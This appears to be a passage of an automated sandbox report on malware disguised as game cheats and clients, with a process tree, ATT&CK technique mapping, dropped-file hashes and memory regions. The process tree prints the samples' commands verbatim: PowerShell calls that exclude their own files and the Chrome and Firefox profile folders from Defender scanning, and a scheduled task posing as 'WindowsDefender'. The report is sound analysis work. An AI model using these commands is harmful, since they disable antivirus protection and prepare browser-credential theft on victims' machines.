        Scheduled Task/Job: Scheduled Task
        
        PID:1076
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Latite Client_BetterV3.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2476
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Latite Client_BetterV3.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4632
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsDefender'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsDefender'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4088
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsDefender" /tr "C:\ProgramData\WindowsDefender"
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3812
        
        C:\Windows\coolhi.exe
        
        "C:\Windows\coolhi.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2144
        
        C:\Windows\coolhi.exe
        
        "C:\Windows\coolhi.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:1952
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default'"
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:4412
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default'
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4756
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles'"
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:4676
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles'
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4324
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        9⤵
        
        PID:1376
      - C:\Users\Admin\AppData\Local\Temp\Dice Roll Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Dice Roll Cheat.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3116
        
        C:\Users\Admin\AppData\Local\Temp\Dice Roll Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Dice Roll Cheat.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3060

C:\ProgramData\WebhookSpammerV5.exe
C:\ProgramData\WebhookSpammerV5.exe
1⤵
- Executes dropped EXE
PID:3612

C:\ProgramData\Latite Client_BetterV3.exe
"C:\ProgramData\Latite Client_BetterV3.exe"
1⤵
- Executes dropped EXE
PID:1312

C:\ProgramData\Latite_Client_betterV1.exe
C:\ProgramData\Latite_Client_betterV1.exe
1⤵
- Executes dropped EXE
PID:4864

C:\ProgramData\WindowsDefender
C:\ProgramData\WindowsDefender
1⤵
- Executes dropped EXE
PID:1028

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ee6f5f5e5924783870aeedeccdafe9da

SHA1
0e12ede20df5ec37f2bf3608ad1bc9b4649450fd

SHA256
ebf215446a1b5afa86e8ba4316bc99c6d7918acd595786a31e0e5974f4e0f416

SHA512
998bad1b069cb0e7a57edef247421e5d5bc0b4f071bd16e4260367e86ac62053168204abc850365bf6eb4f41b32568bea99eb9afda60e7746eff37e604cbe61f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2d06ce10e4e5b9e174b5ebbdad300fad

SHA1
bcc1c231e22238cef02ae25331320060ada2f131

SHA256
87d1dd56f12a88907ba5aebca8d555443d6f77ed214497277cc8bcd31c669f2c

SHA512
38cfbeb59605854ae4fcfae8619a6b26bd916148acfb5636383672a3960b45ca41fed5c241f97465129e92eaf78c4c85dcf258f1ab501a2bf771287ce04f76a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
10890cda4b6eab618e926c4118ab0647

SHA1
1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d

SHA256
00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14

SHA512
a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
773440cd6eb4e778c7d2115d1f231f75

SHA1
4b600aa41fcd267817961c95b104a0717c40e558

SHA256
64c178f2a2edc319c244fa885951e0425ad172e0c9c18d9773069fa13a44385c

SHA512
af0370eb22d7153b7b71a033f56bc08796a0be9a1aa0f479585e03e099a215114f6ac059cf588999f3be36d91bc38ec64b0695071292db8e324ee7bcd505ee35

Download Submit
C:\Users\Admin\AppData\Local\Temp\Dice Roll Cheat.exe

Filesize
5.3MB

MD5
71fd71baa11a5bf59ebb074c1f133047

SHA1
c7a597153b47e7062f74a8351662c3120732792a

SHA256
1ba38156fe338ffdae7f6137824a6555b8029b2ef0dba64e2bfbae0e6b270a86

SHA512
de646b086ec87973c1229175a24b4bf76638ff74ca258fe49d1edea5fcc6659712b6c58563f0d379b33eae98e2aff3c7dcf6b261ac9ce9be489c1e1ff43cf9d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Latite Client_BetterV3.exe

Filesize
143KB

MD5
a677d044cc4d2fe27653f8f285996134

SHA1
30c586c84ee5b9299450b5871ec7186dee562777

SHA256
960d607391f69a4213108dfd0beb8acd0278e6dbefd74dbcb70cac38fc1bde58

SHA512
ec75aa4f63a6989493641bf3aef6869856896e9accd7508a0eb155f8b8e7d790c5b3a444f99214f4044fa7a2c5334515142fe06818abe8712faa49308fb66a5e

Download Submit
C:\Users\Admin\AppData\Local\Temp\WebhookSpammerV1.bat

Filesize
1.7MB

MD5
8ab2176d17600593d71e5763be582739

SHA1
ee0105e502c14645cd3321a23ad8a63d25ff7aab

SHA256
3d63dc5897b50c7c3b90b5679885c734f7d80aa3a7d3104279efb6cb9673df7e

SHA512
4c8266c03550a274b7c637fa12beab6be4460f0b4999a40a9d077f33a0e60a15321ab4748b66d972e26b735ae4a79ab6bdb60307e39b1a51f45ffd8adffba106

Download Submit
C:\Users\Admin\AppData\Local\Temp\WebhookSpammerV5.exe

Filesize
10.6MB

MD5
e490f79ba1a743286fe3f0374fe59f9b

SHA1
86d97c7eb8c830cb9b82d28f3dce4ad13b40176e

SHA256
2992f68726b6d5ea330c2e401377cf9e038913c7fae23b99e1c0c1f13f8367ad

SHA512
dd7ec65de355c7c8bf12165d0b4e35f286913d4fa880a331f92f35a34b84558e580fb4cd3b418271b23e5ce12465f4441f84e6a483e6686814dad1b88a3d7ac6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21442\VCRUNTIME140_1.dll

Filesize
36KB

MD5
7667b0883de4667ec87c3b75bed84d84

SHA1
e6f6df83e813ed8252614a46a5892c4856df1f58

SHA256
04e7ccbdcad7cbaf0ed28692fb08eab832c38aad9071749037ee7a58f45e9d7d

SHA512
968cbaafe416a9e398c5bfd8c5825fa813462ae207d17072c035f916742517edc42349a72ab6795199d34ccece259d5f2f63587cfaeb0026c0667632b05c5c74

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21442\_cffi_backend.cp310-win_amd64.pyd

Filesize
174KB

MD5
12d1fece05057f946654f475c4562a5c

SHA1
539534b9d419815a5dad73603437ecb5afebc0dc

SHA256
1ae3faac65748b494409b4dc6919752ecb444a5136865e5826076be71efd5d85

SHA512
124207d1c35a500f268904d1c4c860ee534cc129cd3cd4a1ffac70a58aa518055a2e7d415622531fcdf834f4d676144a0de729a2d832772e3626e835f5cf2978

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21442\_queue.pyd

Filesize
26KB

MD5
c9ee37e9f3bffd296ade10a27c7e5b50

SHA1
b7eee121b2918b6c0997d4889cff13025af4f676

SHA256
9ecec72c5fe3c83c122043cad8ceb80d239d99d03b8ea665490bbced183ce42a

SHA512
c63bb1b5d84d027439af29c4827fa801df3a2f3d5854c7c79789cad3f5f7561eb2a7406c6f599d2ac553bc31969dc3fa9eef8648bed7282fbc5dc3fb3ba4307f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21442\_sqlite3.pyd

Filesize
91KB

MD5
6486e5c8512bddc5f5606d11fe8f21e0

SHA1
650861b2c4a1d6689ff0a49bb916f8ff278bb387

SHA256
728d21be4d47dd664caf9fa60c1369fe059bc0498edd383b27491d0dee23e439

SHA512
f2c9267a3cab31190079037e3cc5614f19c1235852454708c4978008ea9da345892191750980aebc809cc83dd1f5788b60f8cf39a6a41623210c96af916d1821

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21442\base_library.zip

Filesize
858KB

MD5
1ebb920a2696a11237f3e8e4af10d802

SHA1
f86a052e2dfa2df8884ebf80832814f920a820e6

SHA256
d0e26325e67b3db749a83698413c4c270d8b26cd7dbc607006bc526ee784d6df

SHA512
2cfa6746dcdf575f26267b359a8820a6f29d81967c62131463802b30db2e17c8f159a2cbc652f25bdfdfd7c5942d26a26f9e1df984f8560696153a3427e4fb47

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21442\libssl-1_1.dll

Filesize
678KB

MD5
bd857f444ebbf147a8fcd1215efe79fc

SHA1
1550e0d241c27f41c63f197b1bd669591a20c15b

SHA256
b7c0e42c1a60a2a062b899c8d4ebd0c50ef956177ba21785ce07c517c143aeaf

SHA512
2b85c1521edeadf7e118610d6546fafbbad43c288a7f0f9d38d97c4423a541dfac686634cde956812916830fbb4aad8351a23d95cd490c4a5c0f628244d30f0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21442\python3.dll

Filesize
60KB

MD5
a5471f05fd616b0f8e582211ea470a15

SHA1
cb5f8bf048dc4fc58f80bdfd2e04570dbef4730e

SHA256
8d5e09791b8b251676e16bdd66a7118d88b10b66ad80a87d5897fadbefb91790

SHA512
e87d06778201615b129dcf4e8b4059399128276eb87102b5c3a64b6e92714f6b0d5bde5df4413cc1b66d33a77d7a3912eaa1035f73565dbfd62280d09d46abff

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21442\sqlite3.dll

Filesize
1.4MB

MD5
7bb1d577405f1129faf3ea0225c9d083

SHA1
60472de4b1c7a12468d79994d6d0d684c91091ef

SHA256
831ba87cb1a91d4581f0abbcc4966c6f4b332536f70cf481f609c44cc3d987c2

SHA512
33b1fd3a289193bff168c967caebc0131732bd04562a770cf2edac602ab6d958f7bde7a0e57bb125a7598852bdac30f96d0db46cb4a2460a61a0d914b011ed20

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31162\VCRUNTIME140.dll

Filesize
94KB

MD5
11d9ac94e8cb17bd23dea89f8e757f18

SHA1
d4fb80a512486821ad320c4fd67abcae63005158

SHA256
e1d6f78a72836ea120bd27a33ae89cbdc3f3ca7d9d0231aaa3aac91996d2fa4e

SHA512
aa6afd6bea27f554e3646152d8c4f96f7bcaaa4933f8b7c04346e410f93f23cfa6d29362fd5d51ccbb8b6223e094cd89e351f072ad0517553703f5bf9de28778

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31162\_bz2.pyd

Filesize
78KB

MD5
b45e82a398713163216984f2feba88f6

SHA1
eaaf4b91db6f67d7c57c2711f4e968ce0fe5d839

SHA256
4c2649dc69a8874b91646723aacb84c565efeaa4277c46392055bca9a10497a8

SHA512
b9c4f22dc4b52815c407ab94d18a7f2e1e4f2250aecdb2e75119150e69b006ed69f3000622ec63eabcf0886b7f56ffdb154e0bf57d8f7f45c3b1dd5c18b84ec8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31162\_ctypes.pyd

Filesize
117KB

MD5
79f339753dc8954b8eb45fe70910937e

SHA1
3ad1bf9872dc779f32795988eb85c81fe47b3dd4

SHA256
35cdd122679041ebef264de5626b7805f3f66c8ae6cc451b8bc520be647fa007

SHA512
21e567e813180ed0480c4b21be3e2e67974d8d787e663275be054cee0a3f5161fc39034704dbd25f1412feb021d6a21b300a32d1747dee072820be81b9d9b753

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31162\_decimal.pyd

Filesize
241KB

MD5
1cdd7239fc63b7c8a2e2bc0a08d9ea76

SHA1
85ef6f43ba1343b30a223c48442a8b4f5254d5b0

SHA256
384993b2b8cfcbf155e63f0ee2383a9f9483de92ab73736ff84590a0c4ca2690

SHA512
ba4e19e122f83d477cc4be5e0dea184dafba2f438a587dd4f0ef038abd40cb9cdc1986ee69c34bac3af9cf2347bea137feea3b82e02cca1a7720d735cea7acda

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31162\_hashlib.pyd

Filesize
57KB

MD5
cfb9e0a73a6c9d6d35c2594e52e15234

SHA1
b86042c96f2ce6d8a239b7d426f298a23df8b3b9

SHA256
50daeb3985302a8d85ce8167b0bf08b9da43e7d51ceae50e8e1cdfb0edf218c6

SHA512
22a5fd139d88c0eee7241c5597d8dbbf2b78841565d0ed0df62383ab50fde04b13a203bddef03530f8609f5117869ed06894a572f7655224285823385d7492d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31162\_lzma.pyd

Filesize
149KB

MD5
5a77a1e70e054431236adb9e46f40582

SHA1
be4a8d1618d3ad11cfdb6a366625b37c27f4611a

SHA256
f125a885c10e1be4b12d988d6c19128890e7add75baa935fe1354721aa2dea3e

SHA512
3c14297a1400a93d1a01c7f8b4463bfd6be062ec08daaf5eb7fcbcde7f4fa40ae06e016ff0de16cb03b987c263876f2f437705adc66244d3ee58f23d6bf7f635

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31162\_socket.pyd

Filesize
72KB

MD5
5dd51579fa9b6a06336854889562bec0

SHA1
99c0ed0a15ed450279b01d95b75c162628c9be1d

SHA256
3669e56e99ae3a944fbe7845f0be05aea96a603717e883d56a27dc356f8c2f2c

SHA512
7aa6c6587890ae8c3f9a5e97ebde689243ac5b9abb9b1e887f29c53eef99a53e4b4ec100c03e1c043e2f0d330e7af444c3ca886c9a5e338c2ea42aaacae09f3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31162\base_library.zip

Filesize
858KB

MD5
0eb61f9b08b022e88d61efc7875930d6

SHA1
f2791f356dcae681196c37d1e6a523340adcf638

SHA256
0ff0c5dd453b4f0590a9d94aa6b9ca28e429cc78fc6afca0a415bb4fc06b8ea0

SHA512
b793e4d23cf5be9da6ed5f1ed88d46d4b9b1e8b5e6966e8705a633d183a75cea82aa5d94d43860fafbd02ede9d4d652e62b379d0a6239c2ef5a4f130bb71fe05

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31162\libcrypto-1_1.dll

Filesize
3.3MB

MD5
63c4f445b6998e63a1414f5765c18217

SHA1
8c1ac1b4290b122e62f706f7434517077974f40e

SHA256
664c3e52f914e351bb8a66ce2465ee0d40acab1d2a6b3167ae6acf6f1d1724d2

SHA512
aa7bdb3c5bc8aeefbad70d785f2468acbb88ef6e6cac175da765647030734453a2836f9658dc7ce33f6fff0de85cb701c825ef5c04018d79fa1953c8ef946afd

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31162\libffi-7.dll

Filesize
32KB

MD5
eef7981412be8ea459064d3090f4b3aa

SHA1
c60da4830ce27afc234b3c3014c583f7f0a5a925

SHA256
f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081

SHA512
dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31162\python310.dll

Filesize
4.2MB

MD5
384349987b60775d6fc3a6d202c3e1bd

SHA1
701cb80c55f859ad4a31c53aa744a00d61e467e5

SHA256
f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8

SHA512
6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31162\select.pyd

Filesize
25KB

MD5
78d421a4e6b06b5561c45b9a5c6f86b1

SHA1
c70747d3f2d26a92a0fe0b353f1d1d01693929ac

SHA256
f1694ce82da997faa89a9d22d469bfc94abb0f2063a69ec9b953bc085c2cb823

SHA512
83e02963c9726a40cd4608b69b4cdf697e41c9eedfb2d48f3c02c91500e212e7e0ab03e6b3f70f42e16e734e572593f27b016b901c8aa75f674b6e0fbb735012

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31162\unicodedata.pyd

Filesize
1.1MB

MD5
a40ff441b1b612b3b9f30f28fa3c680d

SHA1
42a309992bdbb68004e2b6b60b450e964276a8fc

SHA256
9b22d93f4db077a70a1d85ffc503980903f1a88e262068dd79c6190ec7a31b08

SHA512
5f9142b16ed7ffc0e5b17d6a4257d7249a21061fe5e928d3cde75265c2b87b723b2e7bd3109c30d2c8f83913134445e8672c98c187073368c244a476ac46c3ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nzsnjoys.vch.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_572.bat

Filesize
29.9MB

MD5
f9fe001633e62b59eec398eaeb5d9b3c

SHA1
edc9879fab5c9e69eca9814584a3079e93a4339d

SHA256
2d17ba79048d0a46969907a6120505f4608f9a252af3a5a21bb875c08aaee2ef

SHA512
0bebd885894e67d2490c55f9d07f7bdaf2e1c5aea1632739fb41b7a05fb6e2a997948dd22f6d1e5b4b1233a40d76ae326acd8d0ad1d54b0ae7c0d55be4da8a20

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_572.vbs

Filesize
115B

MD5
63d69f9a7495097626449c09d3d2b8bf

SHA1
110f53df91d19dc14c31f43c3194391d7b63f7b5

SHA256
a9b7c6c99de10c37f0d8d41e2363381558093c9928119188117c22ea15434c6f

SHA512
89f476a91bcb384ef39e5992bdb2494694d99a5caeaf82589e191e43062387ce6ecd1522dd42371a576a325adcb69f8508db9e8d5c69c5febbe47a9f39db7a92

Download Submit
C:\Windows\Latite_Client_betterV1.exe

Filesize
196KB

MD5
ce0b8f899eaf246c39df74a3d6469c15

SHA1
5806a235161b97ff98b8d3788583700480b763be

SHA256
91fae5a53a72146265efb73813d170e6c261f3154e4b1d97e969169ea8b55669

SHA512
a652172836902b8b025bfd836787706d0ea8e6bb3f2385b54687e2ada84c9ed13f7c7ef9afa784c3c4d9a91ad2330be03cbaccabf20c8fb481a36758420740d4

Download Submit
C:\Windows\coolhi.exe

Filesize
10.4MB

MD5
d6f404cfbad09c7aa09036d54a03559a

SHA1
4a746e1223219eda0ede43ce5aee108ea4f28b28

SHA256
5495250d78bea6bfce37ae281670d3edcb218bc749d1c34b3508c273f42c54d5

SHA512
6e5971102b2c453e79d390978cb23cef186b442dad09e31b5e87c313feaa0cbc2c3ea0debffa8392dc409a041e71183878149b815e769f26b25d6cc1942c9b7f

Download Submit
memory/1388-12-0x00007FFA14910000-0x00007FFA153D1000-memory.dmp

Filesize
10.8MB

Download
memory/1388-11-0x00007FFA14910000-0x00007FFA153D1000-memory.dmp

Filesize
10.8MB

Download
memory/1388-15-0x00007FFA14910000-0x00007FFA153D1000-memory.dmp

Filesize
10.8MB

Download
memory/1388-13-0x00007FFA14913000-0x00007FFA14915000-memory.dmp

Filesize
8KB

Download
memory/1388-16-0x000001B737EC0000-0x000001B737EC8000-memory.dmp

Filesize
32KB

Download
memory/1388-0-0x00007FFA14913000-0x00007FFA14915000-memory.dmp

Filesize
8KB

Download
memory/1388-1-0x000001B750450000-0x000001B750472000-memory.dmp

Filesize
136KB

Download
memory/1388-42-0x00007FFA14910000-0x00007FFA153D1000-memory.dmp

Filesize
10.8MB

Download
memory/1388-14-0x00007FFA14910000-0x00007FFA153D1000-memory.dmp

Filesize
10.8MB

Download
memory/1388-17-0x000001B752740000-0x000001B753E48000-memory.dmp

Filesize
23.0MB

Download
memory/3128-33-0x00007FFA14910000-0x00007FFA153D1000-memory.dmp

Filesize
10.8MB

Download
memory/3128-30-0x00007FFA14910000-0x00007FFA153D1000-memory.dmp

Filesize
10.8MB

Download
memory/3128-19-0x00007FFA14910000-0x00007FFA153D1000-memory.dmp

Filesize
10.8MB

Download
memory/3128-20-0x00007FFA14910000-0x00007FFA153D1000-memory.dmp

Filesize
10.8MB

Download
memory/3924-80-0x0000000000380000-0x0000000000E1C000-memory.dmp

Filesize
10.6MB

Download
memory/3924-147-0x000000001CAC0000-0x000000001D556000-memory.dmp

Filesize
10.6MB

Download
memory/4348-59-0x000001D4B0000000-0x000001D4B1000000-memory.dmp

Filesize
16.0MB

Download
memory/4892-419-0x000000001BBE0000-0x000000001BBE8000-memory.dmp

Filesize
32KB

Download
memory/4892-327-0x0000000000380000-0x00000000003A8000-memory.dmp

Filesize
160KB

Download
memory/4892-371-0x000000001AF10000-0x000000001AF2E000-memory.dmp

Filesize
120KB

Download
memory/5104-308-0x000000001C830000-0x000000001C860000-memory.dmp

Filesize
192KB

Download
memory/5104-159-0x0000000000CA0000-0x0000000000CD8000-memory.dmp

Filesize
224KB

Download